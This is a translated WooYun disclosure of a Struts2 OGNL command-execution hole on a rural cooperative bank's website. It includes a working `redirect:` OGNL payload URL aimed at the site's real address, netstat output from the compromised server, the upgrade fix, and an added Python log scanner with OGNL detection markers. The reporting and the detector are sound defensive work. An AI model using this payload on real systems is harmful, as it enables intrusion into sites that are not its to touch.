WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2015-04-04: Details reported to the vendor; awaiting the vendor's handling
2015-04-08: Vendor has confirmed; details disclosed to the vendor only
2015-04-18: Details disclosed to core white hats and experts in the relevant field
2015-04-28: Details disclosed to regular white hats
2015-05-08: Details disclosed to intern white hats
2015-05-23: Details disclosed to the public
Struts2 command execution vulnerability on the official website
The affected site is the official website of Yunnan Zhaotong Zhaoyang Rural Cooperative Bank. I only did a simple test of whether the vulnerability exists and did not get a shell. The test was able to print the web root path:
http://222.220.144.95/front/company.shtml?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23w.println(%23req.getRealPath("/")),%23w.flush(),%23w.close()}
Output: D:\apache-tomcat-6.0.37\webapps\ROOT\
Executing a command:
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49158 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING
TCP 127.0.0.1:3306 127.0.0.1:61018 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61019 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61020 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61021 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61022 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61023 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61024 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61025 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61026 ESTABLISHED
TCP 127.0.0.1:3306 127.0.0.1:61027 ESTABLISHED
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING
TCP 127.0.0.1:16062 0.0.0.0:0 LISTENING
TCP 127.0.0.1:16063 0.0.0.0:0 LISTENING
TCP 127.0.0.1:60998 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:60999 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61000 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61001 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61002 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61003 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61004 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61005 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61006 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61007 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61008 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61009 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61010 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61011 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61012 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61013 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61014 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61015 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61016 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61017 127.0.0.1:3306 TIME_WAIT
TCP 127.0.0.1:61018 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61019 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61020 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61021 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61022 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61023 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61024 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61025 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61026 127.0.0.1:3306 ESTABLISHED
TCP 127.0.0.1:61027 127.0.0.1:3306 ESTABLISHED
TCP 222.220.144.95:80 202.106.149.178:37474 TIME_WAIT
TCP 222.220.144.95:80 202.106.149.178:37529 ESTABLISHED
TCP 222.220.144.95:135 23.244.84.222:4521 ESTABLISHED
TCP 222.220.144.95:139 0.0.0.0:0 LISTENING
TCP 222.220.144.95:53189 23.234.41.214:12080 ESTABLISHED
D:\apache-tomcat-6.0.37\webapps\ROOT\
Upgrade the Struts2 version.
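Besides upgrading, a site operator will want to know whether this pattern was already tried against them. The request above works by putting an OGNL expression into a query-parameter name that starts with the `redirect:` action prefix, so it leaves a distinctive trace in ordinary access logs. The following is an added example, not part of the WooYun report and not the bank's or Struts' own code: a small log scanner that decodes each request's query string and flags parameters whose name uses the `redirect:` or `redirectAction:` prefix and whose content contains OGNL expression markers. The log lines are constructed (RFC 5737 test addresses, shortened harmless expressions), and the marker list is an assumption chosen for this illustration, not an exhaustive signature set.

```python
"""Flag Struts2 action-prefix OGNL injection attempts in Common Log Format access logs.
Added example for this report; sample log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Request field of a CLF line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter-name prefixes that vulnerable Struts2 versions evaluated as OGNL.
PREFIX_RE = re.compile(r'^(?:redirect|redirectAction):', re.IGNORECASE)
# Substrings that only show up when the parameter carries an OGNL expression
# (assumed marker list for the example; extend it to taste).
OGNL_MARKERS = ("${", "%{", "#context", "#_memberAccess", "@java.lang.")

# Constructed sample log: two benign requests, two prefix-injection attempts.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Apr/2015:10:00:01 +0800] "GET /front/company.shtml HTTP/1.1" 200 5120
203.0.113.5 - - [04/Apr/2015:10:00:02 +0800] "GET /front/company.shtml?id=7&redirect=/home HTTP/1.1" 200 5120
198.51.100.9 - - [04/Apr/2015:10:00:03 +0800] "GET /front/company.shtml?redirect:${%23context} HTTP/1.1" 302 0
198.51.100.9 - - [04/Apr/2015:10:00:04 +0800] "GET /login.action?redirectAction:%25{1%2b1} HTTP/1.1" 302 0
"""


def split_params(target):
    """Return decoded (name, value) pairs from the query string of a request target.

    A bare parameter with no '=' (exactly the shape of a redirect: payload, whose
    own '=' is percent-encoded) yields an empty value. Splitting happens before
    decoding so encoded '&' and '=' inside a payload do not break the parse.
    """
    query = target.partition("?")[2]
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def is_ognl_injection(target):
    """True if any parameter uses an action prefix and carries OGNL markers."""
    for name, value in split_params(target):
        if not PREFIX_RE.match(name):
            continue  # plain 'redirect=/home' has no colon and is ignored
        blob = name + "=" + value
        if any(marker in blob for marker in OGNL_MARKERS):
            return True
    return False


def scan_log(text):
    """Return [(line_no, client_ip, target)] for every suspicious request line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        if is_ognl_injection(target):
            client_ip = line.split(" ", 1)[0]
            hits.append((line_no, client_ip, target))
    return hits


if __name__ == "__main__":
    for line_no, ip, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} -> {target}")
```

Run against the constructed sample it reports lines 3 and 4 only; the benign `redirect=/home` parameter on line 2 is not flagged because the prefix requires the colon. The same check can be dropped into a WAF rule or a SIEM query, but it is a complement to the fix above, not a substitute for upgrading.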
Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-04-08 15:16
CNVD confirmed and reproduced the described situation; the case has been passed to CNCERT for distribution to the corresponding branch center, which will coordinate remediation with the organization that administers the website.
None yet